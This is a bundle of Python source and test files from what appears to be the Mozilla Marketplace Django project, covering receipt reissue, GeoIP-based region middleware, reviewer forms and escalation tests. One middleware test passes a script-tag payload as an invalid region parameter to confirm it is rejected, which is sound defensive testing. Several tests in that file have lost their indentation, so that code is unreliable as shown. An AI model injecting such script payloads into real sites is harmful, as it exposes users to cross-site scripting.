@cors_api_view(['POST'])
@permission_classes((AllowAny,))
def test_receipt(request):
    """Issue a signed test receipt (anonymous REST API for the devhub)."""
    form = forms.TestInstall(request.DATA)
    if not form.is_valid():
        return Response({'error_message': form.errors}, status=400)

    receipt_cef.log(request._request, None, 'sign', 'Test receipt signing')
    data = {
        'receipt': create_test_receipt(form.cleaned_data['root'],
                                       form.cleaned_data['receipt_type'])
    }
    return Response(data, status=201)
@cors_api_view(['POST'])
@permission_classes((AllowAny,))
def reissue(request):
    """
    Reissues an existing receipt, provided from the client. Will only do
    so if the receipt is a full receipt and expired.
    """
    raw = request.read()
    verify = Verify(raw, request.META)
    output = verify.check_full()

    # We will only re-sign expired receipts.
    if output['status'] != 'expired':
        log.info('Receipt not expired returned: {0}'.format(output))
        receipt_cef.log(request._request, None, 'sign',
                        'Receipt reissue failed')
        output['receipt'] = ''
        return Response(output, status=400)

    receipt_cef.log(request._request, None, 'sign', 'Receipt reissue signing')
    return Response({'reason': '', 'receipt': reissue_receipt(raw),
                     'status': 'expired'})
########NEW FILE########
__FILENAME__ = middleware
from django.conf import settings
import commonware.log
from django_statsd.clients import statsd
from lib.geoip import GeoIP
import mkt
from mkt.regions.utils import parse_region
log = commonware.log.getLogger('mkt.regions')
class RegionMiddleware(object):
    """Figure out the user's region and set request.REGION accordingly,
    storing it on the request.amo_user if there is one."""

    def __init__(self):
        self.geoip = GeoIP(settings)

    def region_from_request(self, request):
        """Resolve the region from the request's IP via GeoIP,
        defaulting to RESTOFWORLD when the lookup fails."""
        address = request.META.get('REMOTE_ADDR')
        ip_reg = self.geoip.lookup(address)
        log.info('Geodude lookup for {0} returned {1}'
                 .format(address, ip_reg))
        return parse_region(ip_reg) or mkt.regions.RESTOFWORLD

    def process_request(self, request):
        """Set request.REGION from the 'region' query/POST param if
        valid, otherwise from GeoIP; non-API requests always get
        RESTOFWORLD."""
        regions = mkt.regions.REGION_LOOKUP

        user_region = restofworld = mkt.regions.RESTOFWORLD

        if not getattr(request, 'API', False):
            request.REGION = restofworld
            mkt.regions.set_region(restofworld)
            return

        # Try 'region' in POST/GET data first, if it's not there try geoip.
        url_region = request.REQUEST.get('region')
        if url_region in regions:
            statsd.incr('z.regions.middleware.source.url')
            user_region = regions[url_region]
            log.info('Region {0} specified in URL; region set as {1}'
                     .format(url_region, user_region.slug))
        else:
            statsd.incr('z.regions.middleware.source.geoip')
            user_region = self.region_from_request(request)
            log.info('Region not specified in URL; region set as {0}'
                     .format(user_region.slug))

        # Update the region on the user object if it changed.
        amo_user = getattr(request, 'amo_user', None)
        if amo_user and amo_user.region != user_region.slug:
            amo_user.region = user_region.slug
            amo_user.save()

        # Persist the region on the request / local thread.
        request.REGION = user_region
        mkt.regions.set_region(user_region)
########NEW FILE########
__FILENAME__ = test_init
import mock
from nose.tools import eq_
import mkt.constants.regions as regions
from mkt.regions import get_region, set_region
@mock.patch('mkt.regions._local', None)
def test_get_region_empty():
    """With no thread-local set, get_region falls back to RESTOFWORLD."""
    eq_(get_region(), regions.RESTOFWORLD)
@mock.patch('mkt.regions._local')
def test_get_region_not_empty(local):
    """A stored region slug resolves to its region object."""
    local.region = 'us'
    eq_(get_region(), regions.US)
@mock.patch('mkt.regions._local')
def test_get_region_worldwide(local):
    """The legacy 'worldwide' slug maps to RESTOFWORLD."""
    local.region = 'worldwide'
    eq_(get_region(), regions.RESTOFWORLD)
@mock.patch('mkt.regions._local')
def test_set_region(local):
    """set_region with a slug replaces the current region."""
    local.region = 'us'
    eq_(get_region(), regions.US)
    set_region('es')
    eq_(get_region(), regions.SPAIN)
def test_set_region_object():
    """set_region also accepts region objects, not just slugs."""
    set_region(regions.US)
    eq_(get_region(), regions.US)
    set_region(regions.SPAIN)
    eq_(get_region(), regions.SPAIN)
def test_set_region_bad_slug():
    """An unknown slug falls back to RESTOFWORLD."""
    set_region('foo')
    eq_(get_region(), regions.RESTOFWORLD)
########NEW FILE########
__FILENAME__ = test_middleware
import socket
from django.conf import settings
import mock
from nose.tools import eq_, ok_
import amo.tests
from users.models import UserProfile
import mkt
from mkt.site.fixtures import fixture
_langs = ['cs', 'de', 'en-US', 'es', 'fr', 'pl', 'pt-BR', 'pt-PT']
@mock.patch.object(settings, 'LANGUAGE_URL_MAP',
dict([x.lower(), x] for x in _langs))
class TestRegionMiddleware(amo.tests.TestCase):
    def test_lang_set_with_region(self):
        """The lang cookie is set only on the first request, regardless
        of which region parameter is passed."""
        for region in ('restofworld', 'us', 'br'):
            r = self.client.get('/robots.txt?region=%s' % region)
            if region == 'restofworld':
                # Set cookie for first time only.
                eq_(r.cookies['lang'].value, settings.LANGUAGE_CODE + ',')
            else:
                eq_(r.cookies.get('lang'), None)
            eq_(r.context['request'].LANG, settings.LANGUAGE_CODE)
    def test_no_api_cookie(self):
        """API requests never set cookies."""
        res = self.client.get('/api/v1/apps/schema/?region=restofworld')
        ok_(not res.cookies)
    @mock.patch('mkt.regions.set_region')
    def test_accept_good_region(self, set_region):
        """Every known region slug in the URL is honoured."""
        for region, region_cls in mkt.regions.REGIONS_CHOICES:
            self.client.get('/api/v1/apps/?region=%s' % region)
            set_region.assert_called_with(region_cls)
    @mock.patch('mkt.regions.set_region')
    def test_ignore_bad_region(self, set_region):
        """Empty, wrong-case or junk region params fall through to the
        Accept-Language / geoip path."""
        # When no region is specified or the region is invalid, we use
        # whichever region satisfies `Accept-Language`.
        for region in ('', 'BR', '<script>alert("ballin")</script>'):
            self.client.get('/api/v1/apps/?region=%s' % region,
                            HTTP_ACCEPT_LANGUAGE='fr')
            set_region.assert_called_with(mkt.regions.RESTOFWORLD)
    @mock.patch('mkt.regions.set_region')
    def test_handles_worldwide_as_restofworld(self, set_region):
        """The legacy 'worldwide' slug resolves to RESTOFWORLD."""
        self.client.get('/api/v1/apps/?region=worldwide')
        set_region.assert_called_with(mkt.regions.RESTOFWORLD)
    @mock.patch('mkt.regions.set_region')
    @mock.patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
    def test_url_param_override(self, mock_rfr, set_region):
        """A valid URL region short-circuits the geoip lookup."""
        self.client.get('/api/v1/apps/?region=br')
        set_region.assert_called_with(mkt.regions.BR)
        assert not mock_rfr.called
    @mock.patch('mkt.regions.set_region')
    @mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
    def test_geoip_missing_restofworld(self, set_region):
        """ Test for restofworld region """
        # The remote address by default is 127.0.0.1
        # Use 'sa-US' as the language to defeat the lanugage sniffer
        # Note: This may be problematic should we ever offer
        # apps in US specific derivation of SanskritRight.
        self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
        set_region.assert_called_with(mkt.regions.RESTOFWORLD)
@mock.patch('mkt.regions.middleware.GeoIP.lookup')
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
def test_geoip_lookup_available(self, set_region, mock_lookup):
mock_lookup.return_value = 'br'
self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
set_region.assert_called_with(mkt.regions.BR)
@mock.patch('mkt.regions.middleware.GeoIP.lookup')
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
def test_geoip_lookup_unavailable(self, set_region, mock_lookup):
lang = 'zz'
mock_lookup.return_value = lang
self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
set_region.assert_called_with(mkt.regions.RESTOFWORLD)
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'us')
def test_geoip_missing_lang(self, set_region):
""" Test for US region """
self.client.get('/api/v1/apps/', REMOTE_ADDR='127.0.0.1')
set_region.assert_called_with(mkt.regions.US)
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'us')
@mock.patch('socket.socket')
@mock.patch('mkt.regions.set_region')
def test_geoip_down(self, set_region, mock_socket):
""" Test that we fail gracefully if the GeoIP server is down. """
mock_socket.connect.side_effect = IOError
self.client.get('/api/v1/apps/', REMOTE_ADDR='127.0.0.1')
set_region.assert_called_with(mkt.regions.US)
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'us')
@mock.patch('socket.socket')
@mock.patch('mkt.regions.set_region')
def test_geoip_timeout(self, set_region, mock_socket):
""" Test that we fail gracefully if the GeoIP server times out. """
mock_socket.return_value.connect.return_value = True
mock_socket.return_value.send.side_effect = socket.timeout
self.client.get('/api/v1/apps/', REMOTE_ADDR='127.0.0.1')
set_region.assert_called_with(mkt.regions.US)
@mock.patch('mkt.regions.middleware.GeoIP.lookup')
@mock.patch('mkt.regions.set_region')
@mock.patch.object(settings, 'GEOIP_DEFAULT_VAL', 'restofworld')
def test_geoip_gb(self, set_region, mock_lookup):
mock_lookup.return_value = 'gb'
self.client.get('/api/v1/apps/', HTTP_ACCEPT_LANGUAGE='sa-US')
set_region.assert_called_with(mkt.regions.UK)
class TestRegionMiddlewarePersistence(amo.tests.TestCase):
    """Check that an authenticated user's region choice is persisted."""
    fixtures = fixture('user_999')

    def test_save_region(self):
        self.client.login(username='[email protected]', password='password')
        self.client.get('/api/v1/apps/?region=br')
        # The middleware should save the region onto the user profile.
        eq_(UserProfile.objects.get(pk=999).region, 'br')
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf-8 -*-
from nose.tools import eq_
from mkt.constants import regions
from mkt.regions.utils import parse_region, remove_accents
def test_parse_region():
    """parse_region accepts slugs, names (any case), ids (int or digit
    string) and region classes; unknown input yields None."""
    eq_(parse_region('restofworld'), regions.RESTOFWORLD)
    eq_(parse_region('br'), regions.BR)
    eq_(parse_region('brazil'), regions.BR)
    eq_(parse_region('bRaZiL'), regions.BR)
    eq_(parse_region('7'), regions.BR)
    eq_(parse_region(7), regions.BR)
    eq_(parse_region(regions.BR), regions.BR)
    eq_(parse_region(''), None)
def test_parse_worldwide_region_as_restofworld():
    """The legacy 'worldwide' slug maps to the RESTOFWORLD region."""
    eq_(parse_region('worldwide'), regions.RESTOFWORLD)
def test_remove_accents():
    """remove_accents strips combining diacritics from unicode text."""
    eq_(remove_accents(u'café'), u'cafe')
    eq_(remove_accents(u'Équateur'), u'Equateur')
    eq_(remove_accents(u'Pérou'), u'Perou')
    eq_(remove_accents(u'Węgry'), u'Wegry')
    # This hits the limitations of what's possible with built-in
    # functions but shows that if the diacritic isn't found the
    # string remains un-molested.
    eq_(remove_accents(u'Włochy'), u'Włochy')
########NEW FILE########
__FILENAME__ = utils
import unicodedata
from mkt.constants import regions
def parse_region(region):
    """
    Return a region class definition given a slug, id, name, or class
    definition.

    Accepts, in lookup order:
      * a region class itself (subclass of ``regions.REGION``),
      * a numeric id (int or digit string),
      * a slug (e.g. ``'br'``),
      * a human-readable name, matched case-insensitively (e.g. ``'Brazil'``).

    Returns ``None`` when nothing matches. Raises ``KeyError`` for a
    numeric id that is not a known region (unchanged behavior).
    """
    if isinstance(region, type) and issubclass(region, regions.REGION):
        return region

    if str(region).isdigit():
        # Look up the region by ID.
        return regions.REGIONS_CHOICES_ID_DICT[int(region)]

    # Look up the region by slug.
    region_by_slug = regions.REGION_LOOKUP.get(region)
    if region_by_slug is not None:
        return region_by_slug

    # Look up the region by name, case-insensitively. Use a distinct loop
    # variable so we don't shadow the `region` argument.
    region_lower = region.lower()
    for candidate in regions.ALL_REGIONS:
        if unicode(candidate.name).lower() == region_lower:
            return candidate

    # Nothing matched; be explicit about it.
    return None
def remove_accents(input_str):
    """Return *input_str* with accent marks (combining diacritics) removed.

    The input is NFKD-normalized so that accented characters decompose
    into a base character plus combining marks, and the marks are then
    dropped. Characters with no decomposition are left untouched.
    """
    decomposed = unicodedata.normalize('NFKD', unicode(input_str))
    return u''.join(ch for ch in decomposed
                    if not unicodedata.combining(ch))
########NEW FILE########
__FILENAME__ = forms
import logging
from django import forms
import happyforms
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from addons.models import AddonDeviceType
from editors.forms import NonValidatingChoiceField, ReviewLogForm
from editors.models import CannedResponse
from mkt.api.forms import CustomNullBooleanSelect
from mkt.reviewers.utils import ReviewHelper
from mkt.search.forms import ApiSearchForm
log = logging.getLogger('z.reviewers.forms')
# We default to 'any' since consumer-facing pages fall back to PUBLIC
# when no explicit status filter is supplied.
STATUS_CHOICES = [('any', _lazy(u'Any Status'))]
for status in amo.WEBAPPS_UNLISTED_STATUSES + (amo.STATUS_PUBLIC,):
    STATUS_CHOICES.append((amo.STATUS_CHOICES_API[status],
                           amo.MKT_STATUS_CHOICES[status]))
class ReviewAppForm(happyforms.Form):
    """Form reviewers use to submit a review decision for an app.

    The available actions and the canned responses offered are derived
    from the ``ReviewHelper`` passed in via the ``helper`` kwarg.
    """

    comments = forms.CharField(widget=forms.Textarea(),
                               label=_lazy(u'Comments:'))
    canned_response = NonValidatingChoiceField(required=False)
    action = forms.ChoiceField(widget=forms.RadioSelect())
    device_types = forms.CharField(required=False,
                                   label=_lazy(u'Device Types:'))
    browsers = forms.CharField(required=False,
                               label=_lazy(u'Browsers:'))
    device_override = forms.TypedMultipleChoiceField(
        choices=[(k, v.name) for k, v in amo.DEVICE_TYPES.items()],
        coerce=int, label=_lazy(u'Device Type Override:'),
        widget=forms.CheckboxSelectMultiple, required=False)
    notify = forms.BooleanField(
        required=False, label=_lazy(u'Notify me the next time the manifest is '
                                    u'updated. (Subsequent updates will not '
                                    u'generate an email)'))
    is_tarako = forms.BooleanField(
        required=False, label=_lazy(u'This app works on Tarako devices.'))

    def __init__(self, *args, **kw):
        # `helper` is required; `type` picks which canned responses apply.
        self.helper = kw.pop('helper')
        self.type = kw.pop('type', amo.CANNED_RESPONSE_APP)
        super(ReviewAppForm, self).__init__(*args, **kw)

        # We're starting with an empty one, which will be hidden via CSS.
        canned_choices = [['', [('', _('Choose a canned response...'))]]]

        responses = CannedResponse.objects.filter(type=self.type)

        # Loop through the actions and group the matching canned
        # responses under each action label.
        for k, action in self.helper.actions.iteritems():
            action_choices = [[c.response, c.name] for c in responses
                              if c.sort_group and k in c.sort_group.split(',')]

            # Add the group of responses to the canned_choices array.
            if action_choices:
                canned_choices.append([action['label'], action_choices])

        # Now, add everything not in a group.
        for r in responses:
            if not r.sort_group:
                canned_choices.append([r.response, r.name])

        self.fields['canned_response'].choices = canned_choices
        self.fields['action'].choices = [(k, v['label']) for k, v
                                         in self.helper.actions.items()]
        # Pre-select the app's current device types as the override default.
        device_types = AddonDeviceType.objects.filter(
            addon=self.helper.addon).values_list('device_type', flat=True)
        if device_types:
            self.initial['device_override'] = device_types

        self.initial['is_tarako'] = (
            self.helper.addon.tags.filter(tag_text='tarako').exists())

    def is_valid(self):
        # On success, hand the cleaned data over to the helper so the
        # review action can be processed.
        result = super(ReviewAppForm, self).is_valid()
        if result:
            self.helper.set_data(self.cleaned_data)
        return result
def get_review_form(data, files, request=None, addon=None, version=None,
                    attachment_formset=None):
    """Convenience factory: build a ReviewAppForm bound to a ReviewHelper."""
    review_helper = ReviewHelper(
        request=request, addon=addon, version=version,
        attachment_formset=attachment_formset)
    return ReviewAppForm(data=data, files=files, helper=review_helper)
class ReviewAppLogForm(ReviewLogForm):
    """Review-log search form with an app-specific search placeholder."""

    def __init__(self, *args, **kwargs):
        super(ReviewAppLogForm, self).__init__(*args, **kwargs)
        self.fields['search'].widget.attrs = {
            # L10n: Description of what can be searched for.
            'placeholder': _lazy(u'app, reviewer, or comment'),
            'size': 30}
class ApiReviewersSearchForm(ApiSearchForm):
    """Search form for the reviewers app-search API, adding reviewer-only
    filters (status, editor comments, info requests, escalation, Tarako)."""

    status = forms.ChoiceField(required=False, choices=STATUS_CHOICES,
                               label=_lazy(u'Status'))
    has_editor_comment = forms.NullBooleanField(
        required=False,
        label=_lazy(u'Has Editor Comment'),
        widget=CustomNullBooleanSelect)
    has_info_request = forms.NullBooleanField(
        required=False,
        label=_lazy(u'More Info Requested'),
        widget=CustomNullBooleanSelect)
    is_escalated = forms.NullBooleanField(
        required=False,
        label=_lazy(u'Escalated'),
        widget=CustomNullBooleanSelect)
    is_tarako = forms.NullBooleanField(
        required=False,
        label=_lazy(u'Tarako-ready'),
        widget=CustomNullBooleanSelect)

    def __init__(self, *args, **kwargs):
        super(ApiReviewersSearchForm, self).__init__(*args, **kwargs)

        # Mobile form, to render, expects choices from the Django field.
        BOOL_CHOICES = ((u'', _lazy('Unknown')),
                        (u'true', _lazy('Yes')),
                        (u'false', _lazy('No')))
        for field_name, field in self.fields.iteritems():
            if isinstance(field, forms.NullBooleanField):
                self.fields[field_name].choices = BOOL_CHOICES

    def clean_status(self):
        # Map the API status string back to its DB constant. 'any' means
        # no status filter; unknown values fall back to STATUS_PENDING.
        status = self.cleaned_data['status']
        if status == 'any':
            return 'any'

        return amo.STATUS_CHOICES_API_LOOKUP.get(status, amo.STATUS_PENDING)
class ApproveRegionForm(happyforms.Form):
    """TODO: Use a DRF serializer."""
    # Whether the reviewer approved the app for `self.region`.
    approve = forms.BooleanField(required=False)

    def __init__(self, *args, **kw):
        # `app` and `region` are required context for save().
        self.app = kw.pop('app')
        self.region = kw.pop('region')
        super(ApproveRegionForm, self).__init__(*args, **kw)

    def save(self):
        """Apply the approval/rejection to the app's per-region status."""
        approved = self.cleaned_data['approve']

        if approved:
            status = amo.STATUS_PUBLIC
            # Make it public in the previously excluded region.
            self.app.addonexcludedregion.filter(
                region=self.region.id).delete()
        else:
            status = amo.STATUS_REJECTED

        value, changed = self.app.geodata.set_status(
            self.region, status, save=True)
        if changed:
            self.app.save()
########NEW FILE########
__FILENAME__ = helpers
import urlparse
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_str
import jinja2
from jingo import register
from tower import ugettext as _, ugettext_lazy as _lazy
import mkt
from access import acl
from amo.helpers import impala_breadcrumbs
from mkt.developers.helpers import mkt_page_title
from mkt.reviewers.utils import (AppsReviewing, clean_sort_param,
create_sort_link, device_queue_search)
@register.function
@jinja2.contextfunction
def reviewers_breadcrumbs(context, queue=None, items=None):
    """
    Wrapper function for ``breadcrumbs``. Prepends 'Editor Tools'
    breadcrumbs.

    **queue**
        Explicit queue type to set.
    **items**
        list of [(url, label)] to be inserted after Add-on.
    """
    crumbs = [(reverse('reviewers.home'), _('Reviewer Tools'))]

    if queue:
        queues = {'pending': _('Apps'),
                  'rereview': _('Re-reviews'),
                  'updates': _('Updates'),
                  'escalated': _('Escalations'),
                  'device': _('Device'),
                  'moderated': _('Moderated Reviews'),
                  'reviewing': _('Reviewing'),
                  'region': _('Regional Queues')}

        # Only link the queue crumb when more crumbs follow it.
        if items:
            url = reverse('reviewers.apps.queue_%s' % queue)
        else:
            # The Addon is the end of the trail.
            url = None
        crumbs.append((url, queues[queue]))

    if items:
        crumbs.extend(items)
    return impala_breadcrumbs(context, crumbs, add_default=True)
@register.function
@jinja2.contextfunction
def reviewers_page_title(context, title=None, addon=None):
    """Build the '<title> | <section>' page title for reviewer pages.

    With an add-on the section is the add-on name; otherwise it is the
    'Reviewer Tools' section (used alone when no title is given).
    """
    if addon:
        full_title = u'%s | %s' % (title, addon.name)
    elif title:
        full_title = u'%s | %s' % (title, _lazy('Reviewer Tools'))
    else:
        full_title = _lazy('Reviewer Tools')
    return mkt_page_title(context, full_title)
@register.function
@jinja2.contextfunction
def queue_tabnav(context):
    """
    Returns tuple of tab navigation for the queue pages.

    Each tuple contains three elements: (url, tab_code, tab_text)
    """
    request = context['request']
    counts = context['queue_counts']
    apps_reviewing = AppsReviewing(request).get_apps()

    # Apps: base queues plus permission-gated extras.
    if acl.action_allowed(request, 'Apps', 'Review'):
        rv = [
            (reverse('reviewers.apps.queue_pending'), 'pending',
             _('Apps ({0})', counts['pending']).format(counts['pending'])),

            (reverse('reviewers.apps.queue_rereview'), 'rereview',
             _('Re-reviews ({0})', counts['rereview']).format(
                 counts['rereview'])),

            (reverse('reviewers.apps.queue_updates'), 'updates',
             _('Updates ({0})', counts['updates']).format(counts['updates'])),
        ]
        # Escalations queue requires an extra permission.
        if acl.action_allowed(request, 'Apps', 'ReviewEscalated'):
            rv.append((reverse('reviewers.apps.queue_escalated'), 'escalated',
                       _('Escalations ({0})', counts['escalated']).format(
                           counts['escalated'])))
        rv.extend([
            (reverse('reviewers.apps.queue_moderated'), 'moderated',
             _('Moderated Reviews ({0})', counts['moderated'])
             .format(counts['moderated'])),

            (reverse('reviewers.apps.apps_reviewing'), 'reviewing',
             _('Reviewing ({0})').format(len(apps_reviewing))),
        ])
        # Regional (China) queue requires its own permission.
        if acl.action_allowed(request, 'Apps', 'ReviewRegionCN'):
            url_ = reverse('reviewers.apps.queue_region',
                           args=[mkt.regions.CN.slug])
            rv.append((url_, 'region',
                       _('China ({0})').format(counts['region_cn'])))
    else:
        rv = []

    # Device queue is opt-in via the 'pro' feature-profile GET param.
    if 'pro' in request.GET:
        device_srch = device_queue_search(request)
        rv.append((reverse('reviewers.apps.queue_device'), 'device',
                   _('Device ({0})').format(device_srch.count()),))

    return rv
@register.function
@jinja2.contextfunction
def logs_tabnav(context):
    """
    Returns tuple of tab navigation for the log pages.

    Each tuple contains three elements: (named url, tab_code, tab_text)
    """
    return [('reviewers.apps.logs', 'apps', _('Reviews'))]
@register.function
@jinja2.contextfunction
def sort_link(context, pretty_name, sort_field):
    """Get table header sort links.

    pretty_name -- name displayed on table header
    sort_field -- name of get parameter, referenced to in views
    """
    request = context['request']
    sort, order = clean_sort_param(request)

    # Carry over every search/filter GET parameter except the sort ones,
    # which create_sort_link will regenerate.
    query_string = smart_str(request.META['QUERY_STRING'])
    get_params = []
    for key, value in urlparse.parse_qsl(query_string):
        if key in ('sort', 'order'):
            continue
        get_params.append((key, value))

    return create_sort_link(pretty_name, sort_field, get_params,
                            sort, order)
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo
from apps.addons.models import Addon
from apps.editors.models import CannedResponse, EscalationQueue, RereviewQueue
class AppCannedResponseManager(amo.models.ManagerBase):
    """Manager that restricts canned responses to the app type."""

    def get_query_set(self):
        qs = super(AppCannedResponseManager, self).get_query_set()
        return qs.filter(type=amo.CANNED_RESPONSE_APP)
class AppCannedResponse(CannedResponse):
    """Proxy model exposing only app-type canned responses."""
    objects = AppCannedResponseManager()

    class Meta:
        proxy = True
def cleanup_queues(sender, instance, **kwargs):
    """Remove a deleted add-on from the rereview and escalation queues."""
    for queue_model in (RereviewQueue, EscalationQueue):
        queue_model.objects.filter(addon=instance).delete()


models.signals.post_delete.connect(cleanup_queues, sender=Addon,
                                   dispatch_uid='queue-addon-cleanup')
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from mkt.search.serializers import ESAppSerializer
from mkt.webapps.models import Webapp
class ReviewingSerializer(serializers.ModelSerializer):
    """Minimal serializer for apps currently being reviewed: it exposes
    only each app's API resource URI."""

    class Meta:
        model = Webapp
        fields = ('resource_uri', )

    resource_uri = serializers.HyperlinkedRelatedField(view_name='app-detail',
                                                       read_only=True,
                                                       source='*')
# Public fields exposed for each app result in the reviewers search API.
SEARCH_FIELDS = [u'device_types', u'id', u'is_escalated', u'is_packaged',
                 u'name', u'premium_type', u'price', u'slug', u'status']
class ReviewersESAppSerializer(ESAppSerializer):
    """Elasticsearch-backed app serializer for reviewers, adding
    reviewer-only fields on top of the public search fields."""
    latest_version = serializers.Field(source='es_data.latest_version')
    is_escalated = serializers.BooleanField()

    class Meta(ESAppSerializer.Meta):
        fields = SEARCH_FIELDS + ['latest_version', 'is_escalated']
########NEW FILE########
__FILENAME__ = test_forms
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from mock import patch
from nose.tools import eq_
import amo
import amo.tests
from mkt.comm.forms import CommAttachmentForm
@patch.object(settings, 'MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE', 1024)
class TestReviewAppAttachmentForm(amo.tests.TestCase):
    """Validation tests for CommAttachmentForm: required fields and the
    attachment size limit."""

    def setUp(self):
        self.max_size = settings.MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE

    def post_data(self, **kwargs):
        # Base POST payload, overridable via kwargs.
        post_data = {
            'description': 'My Test File'
        }
        post_data.update(kwargs)
        return post_data

    def file_data(self, size=1024):
        # Build an upload of `size` bytes; size=0 means no attachment.
        file_data = {
            'attachment': None
        }
        if size:
            file_data['attachment'] = SimpleUploadedFile('bacon.txt',
                                                         ' ' * size)
        return file_data

    def test_no_attachment(self):
        file_data = self.file_data(size=0)
        self.check_valid(False, file_data=file_data)

    def test_no_description(self):
        post_data = self.post_data(description=None)
        self.check_valid(True, post_data=post_data)

    def test_attachment_okay(self):
        file_data = self.file_data(size=self.max_size)
        self.check_valid(True, file_data=file_data)

    def test_attachment_too_large(self):
        file_data = self.file_data(size=self.max_size + 1)
        self.check_valid(False, file_data=file_data)

    def check_valid(self, valid, post_data=None, file_data=None):
        # Assert the form's validity for the given (or default) data.
        if not post_data:
            post_data = self.post_data()
        if not file_data:
            file_data = self.file_data()
        form = CommAttachmentForm(post_data, file_data)
        eq_(form.is_valid(), valid)
########NEW FILE########
__FILENAME__ = test_tasks
import datetime
from django.conf import settings
import mock
from nose.tools import eq_
import amo
from abuse.models import AbuseReport
from amo.tasks import find_abuse_escalations, find_refund_escalations
from amo.tests import app_factory
from devhub.models import AppLog
from editors.models import EscalationQueue
from stats.models import Contribution
from users.models import UserProfile
from mkt.prices.models import AddonPurchase, Refund
class TestAbuseEscalationTask(amo.tests.TestCase):
    """Tests for find_abuse_escalations: apps with enough recent abuse
    reports are added (at most once) to the escalation queue."""
    fixtures = ['base/users']

    def setUp(self):
        self.app = app_factory(name='XXX')
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

        patcher = mock.patch.object(settings, 'TASK_USER_ID', 4043307)
        patcher.start()
        self.addCleanup(patcher.stop)

    def test_no_abuses_no_history(self):
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

    def test_abuse_no_history(self):
        for x in range(2):
            AbuseReport.objects.create(addon=self.app)
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

    def test_abuse_already_escalated(self):
        for x in range(2):
            AbuseReport.objects.create(addon=self.app)
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)
        # Re-running the task must not enqueue the app a second time.
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

    def test_abuse_cleared_not_escalated(self):
        for x in range(2):
            ar = AbuseReport.objects.create(addon=self.app)
            ar.created = datetime.datetime.now() - datetime.timedelta(days=1)
            ar.save()
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

        # Simulate a reviewer clearing an escalation... remove app from queue,
        # and write a log.
        EscalationQueue.objects.filter(addon=self.app).delete()
        amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
                details={'comments': 'All clear'})
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

        # Task will find it again but not add it again.
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

    def test_older_abuses_cleared_then_new(self):
        for x in range(2):
            ar = AbuseReport.objects.create(addon=self.app)
            ar.created = datetime.datetime.now() - datetime.timedelta(days=1)
            ar.save()
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

        # Simulate a reviewer clearing an escalation... remove app from queue,
        # and write a log.
        EscalationQueue.objects.filter(addon=self.app).delete()
        amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.app.current_version,
                details={'comments': 'All clear'})
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

        # Task will find it again but not add it again.
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

        # New abuse reports that come in should re-add to queue.
        for x in range(2):
            AbuseReport.objects.create(addon=self.app)
        find_abuse_escalations(self.app.id)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 1)

    def test_already_escalated_for_other_still_logs(self):
        # Add app to queue for high refunds.
        EscalationQueue.objects.create(addon=self.app)
        amo.log(amo.LOG.ESCALATED_HIGH_REFUNDS, self.app,
                self.app.current_version, details={'comments': 'hi refunds'})

        # Set up abuses.
        for x in range(2):
            AbuseReport.objects.create(addon=self.app)
        find_abuse_escalations(self.app.id)

        # Verify it logged the high abuse reports.
        action = amo.LOG.ESCALATED_HIGH_ABUSE
        assert AppLog.objects.filter(
            addon=self.app, activity_log__action=action.id).exists(), (
                u'Expected high abuse to be logged')
class TestRefundsEscalationTask(amo.tests.TestCase):
    """Tests for find_refund_escalations: apps whose refund/purchase ratio
    is too high are added (at most once) to the escalation queue."""
    fixtures = ['base/users']

    def setUp(self):
        self.app = app_factory(name='XXX')
        self.user1, self.user2, self.user3 = UserProfile.objects.all()[:3]
        patcher = mock.patch.object(settings, 'TASK_USER_ID', 4043307)
        patcher.start()
        self.addCleanup(patcher.stop)
        eq_(EscalationQueue.objects.filter(addon=self.app).count(), 0)

    def _purchase(self, user=None, created=None):
        # Create a purchase of self.app, optionally backdated to `created`.
        ap1 = AddonPurchase.objects.create(user=user or self.user1,
                                           addon=self.app)
        if created:
            ap1.update(created=created)

    def _refund(self, user=None, created=None):
        # Create a refund (with its contribution), optionally backdated.
        contribution = Contribution.objects.create(addon=self.app,
                                                   user=user or self.user1)
        ref = Refund.objects.create(contribution=contribution,
                                    user=user or self.user1)
        if created:
            ref.update(created=created)
            # Needed because these tests can run in the same second and the
            # refund detection task depends on timestamp logic for when to
            # escalate.
            applog = AppLog.objects.all().order_by('-created', '-id')[0]
